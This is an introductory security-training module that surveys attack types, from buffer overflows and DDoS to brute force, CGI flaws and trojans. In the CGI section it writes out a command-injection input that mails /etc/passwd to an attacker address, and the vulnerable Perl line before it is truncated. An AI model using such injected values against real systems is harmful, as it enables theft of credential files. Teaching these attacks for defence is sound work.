There exist numerous ways to attack a target system. It could be achieved by exploiting known vulnerabilities in software or taking advantage of a badly configured security policy; it could be implemented remotely or internally. The techniques and methods used are likely to vary depending on the target and they should be chosen appropriately having assessed the situation fully. The attack types and vulnerabilities discussed in this module are:
1. Buffer Overflow attacks.
2. Denial of Service (DoS) attacks.
3. Distributed Denial of Service (DDoS) attacks.
4. Misconfigurations.
5. Abuse of Trust.
6. Brute force attacks.
7. CGI and WWW services.
8. Back doors and Trojans.
1. Buffer Overflow Attacks
These attacks exploit poorly written software to allow attackers to execute arbitrary code on the target system. Overflows can occur in server software which is available to users over the network, or in programs which exist on multi-user operating systems. In either case, a successful overflow will allow the attacker to execute arbitrary code with the privilege of the vulnerable service. The most sought after exploits in the hacker community are “remote root” exploits; however, they are not as common as the local exploits. A local exploit occurs in a service that is not available over the network, but is shared by users in a multi-user operating system such as UNIX. This allows for the same escalation of privilege as that provided by the remote exploits.
Example
If the sendmail daemon is running with root privileges and contains a buffer overflow, then commands executed via the overflow will provide the attacker with a means of executing commands as root.
2. Denial of Service (DoS) Attacks
Denial of Service or DoS attacks result in a specific service being made unavailable to legitimate users. These attacks typically have one of three targets:
• The network connection providing access to the service.
• The operating system hosting the service.
• The application level program providing the service.
The Network Connection Providing Access to the Service
By flooding the network with traffic, less bandwidth is available for use by the service. If enough bandwidth is consumed in this flood, access to the service could effectively deny service to legitimate users.
Example
A typical example of this is the Smurf attack, where data is sent to the broadcast address of a network, and the source address of the traffic is specified as that of the target machine. This results in all the systems on the network responding to the supposed source at the same time, thereby generating huge amounts of traffic.
The Operating System Hosting the Service
Operating systems have been found to be vulnerable to denial of service attacks. In the case of network based attacks this is caused by the operating system's specific implementation of the networking stack. A bug in this stack can cause the entire operating system to hang or reboot when anomalous network traffic is encountered.
Example
A well known example is the Windows NT Out of Bound attack (OOB), which caused affected systems to produce the “blue screen of death” when sent specific IP packets. We can expect to see more vulnerable IP stacks appearing as the market focus shifts to embedded Internet enabled devices, where each vendor is using their own implementation of the IP stack.
The Application Level Program Providing the Service
Network applications can be vulnerable to denial of service attacks in the same way that operating systems are. If no allowances are made for unexpected traffic or other input, the application could encounter a condition where it hangs, and can no longer provide the service it was designed for. Poor error handling in the code could lead to the same result. If the operating system does not take adequate precautions for extreme conditions, it could be vulnerable to an attack that attempts to exhaust the physical resources available on the system. Several such attacks have been released which push the CPU to 100 percent utilization, and thereby deny access to other services.
3. Distributed Denial of Service (DDoS) Attacks
Otherwise known as DDoS, these attacks have the same goal as standard Denial of Service attacks but use a different architecture in achieving it. A single host launching a network or application level attack against a target is constrained by it's own available network bandwidth and system resources, a group of machines can be more effective in a concerted attack. The current DDoS programs publicly available all use the same basic architecture to control the attack, common examples being:
• Stacheldraht.
• TFN.
• TFN2K.
• Trinoo.
Installing DDoS Software
There is a relatively standard procedure that is followed when installing the DDoS software in preparation for an attack.
1. Previously compromised hosts have “zombie” agents installed on them.
2. Another compromised host has the master controlling software installed on it. This piece of software is configured to be aware of the location of all the agents.
3. The last step is to install client software on the attacker's machine, used to initiate the attack.
Initiating the Attack
The attack is typically initiated in the following manner:
1. The client communicates the IP addresses of the desired targets to the master system.
2. This master system then instructs each of the agents to launch an attack against the target using standard DoS techniques. Early detection of these systems was possible by scanning machines for the presence of agents and by sniffing network traffic to detect the communication between the master and the agents.
Evolution of DDoS
As the DDoS tools have evolved they now incorporate encryption as part of the master to agent communication and allow agents to listen UDP ports, which only respond when sent a shared secret key. These two enhancements make detecting these systems remotely, a very difficult task.
4. Misconfigurations
Although exploits feature heavily in security related news, far more successful attacks are conducted by abusing common misconfigurations in network services. Network services should always be configured with a “deny access by default” policy. The opposite is often the case, which results in a number of services being vulnerable to malicious attack. Access controls on network services often lead to further privilege escalation and eventual compromise of the system. This was illustrated by the recent successful attack on the Apache web site. The attackers exploited a poorly configured ftp server, which allowed write access to the web site. This in turn allowed them to run a script, via the web and gain remote root access to the system. By default, certain products, such as Checkpoint's Firewall-1, are installed with settings that open them up to security vulnerabilities and have to be specifically reconfigured to ensure their secure operation.
5. Abuse of Trust
Early networking protocols did not place a lot of emphasis on encryption and authentication, as they were used in relatively small networks. As these networks and systems formed part of the Internet, it became possible to exploit weaknesses in these protocols. An example is the use of a source IP address as the means of establishing a trust relationship between two systems. Common attacks exploit this weakness by spoofing the address of the trusted host and thereby gain access to the trusting system and its resources. Typical examples are NFS and the “r” utilities (rsh, rlogin).
6. Brute Force Attacks
These attacks are aimed at gaining access to a system by repeated attempts at authentication. Most services that require a username and password, and have no facility for account lockout, are vulnerable to this type of attack. Brute force methods are commonly used to crack password files, as this can be done reasonably quickly on a local system. Common tools used in this case are:
• Crack - A UNIX based program.
• L0phtcrack - A Windows based program.
Attacking network based services can be more time consuming as the response time will depend heavily on the network load. Tools exist to crack the following services:
• Telnet.
• ftp.
• Http.
• CGI logins.
To improve the chances of a successful brute force attack, one part of a two part authentication is needed. This can be obtained from other network or system vulnerabilities, e.g. finger or null sessions, or by “dumpster diving” and other social engineering methods.
Dictionary Attack
Once a username has been established, it is expedient to first try a dictionary based attack which tries words from various dictionaries until a match is found. The dictionaries available vary in size and scope as well as subject. There are specific themes dictionaries available such as Star Wars dictionaries that can be used in conjunction with other information to produce a more targeted attack. Failing a dictionary attack, a true brute force method can be followed, which attempts every combination of characters from a known subset until a match is found. This can be very time consuming if this subset is large or if the minimum password length is relatively long.
7. CGI and WWW Services
As more websites offer interactive services, more CGI and web based vulnerabilities are being uncovered. CGI vulnerabilities fall into three categories:
• Buffer overflow.
• Command execution.
• Subverting client side scripting.
Buffer Overflow
Standard buffer overflow techniques can be applied to CGI scripts. Since scripts allow for user input, this input could be used to overflow buffers in vulnerable programs. This only affects scripts written in relatively low level languages such as C. Scripts should always perform validation on all user input and internal functions should do sanity checking on the size of buffers. Higher level, and more commonly used scripting languages perform bounds checking on variable and array lengths internally and will consequently not be vulnerable to buffer overflow attack. Examples of such languages are:
• Java.
• Perl.
• Python.
Command Execution
Scripts written in higher level languages sometimes contain more insidious vulnerabilities than their low level cousins. A common occurrence of this is command execution on the remote machine. This is once again caused by poor input validation. For example, CGI scripts sometimes contain code that executes shell commands such as the Perl command:
System("mail $email <>
Which is a simple way of mailing a document to a user. In this example the $email variable will contain an email address that was entered in a form on the website. If no input validation is done when the user enters her email address, it will be possible to imbed shell commands into the input field and have them executed by the system call.
hacker@hack.net < /etc/passwd;
Inserting the above value will cause the password file to be mailed to the attacker. As with buffer overflow attacks the level of privilege with which these commands are executed are dependent on the privilege level of the CGI script.
Subverting Client Side Scripting
Client side scripting in the form of Java script or VB script is sometimes used to perform input validation. This has the feature that the user is immediately notified when incorrect data is entered, and doesn’t have to wait for the form to be submitted before receiving feedback. Input validation done at this level presents serious security flaws, as the client side source code is available and editable by the end user. By simply removing the restriction on character sets and input length, buffer overflow and command execution attacks can then be attempted. Client side input validation should always be used as an added feature to server side validation and should not be considered a replacement. Very poorly written client side scripts sometimes contain usernames and passwords which can be used to gain access to the system.
8. Backdoors and Trojans
Trojans and backdoor programs are becoming an increasingly popular method for gaining unauthorized access to remote systems. Backdoors offer the attacker an easy way of accessing a remote system, without having to rely on exploits or other security vulnerabilities. The simplest backdoors take the form of command shells listening on unusual ports. A commonly used tool is NetCat, which is available on both the Windows and UNIX platforms. Once NetCat is installed and listening on port XXXX, the attacker need only telnet to port XXXX and be presented with a remote command shell.
Backdoor and Trojan Development
As intrusion detection and Firewalling technologies have improved, so have the backdoor programs. The simple TCP based remote shell utilities have been superseded by UDP and ICMP based programs that support encrypted data channels. The ability to control these backdoors with UDP packets allows them to be deployed behind firewalls that allow UDP traffic, typically for DNS on port 53. Similarly, if the Firewall in question allows ICMP packets through, these can be used to communicate with the backdoor programs. The use of encrypted data channels means that intrusion detection software can no longer inspect the packet data for signatures, making detection of these backdoors even more difficult.
Deployment
Backdoors can also be deployed on “virgin” systems without having to first compromise them through other means. This can be accomplished by imbedding the backdoor in an email attachment, ActiveX control or a file on the internet. Utilities such as Silkrope and Saranwrap exist, which allow the attacker to attach the Trojan to a seemingly legitimate file. Well known backdoor programs on the Microsoft Windows platform, include:
• BackOrifice.
• NetBus.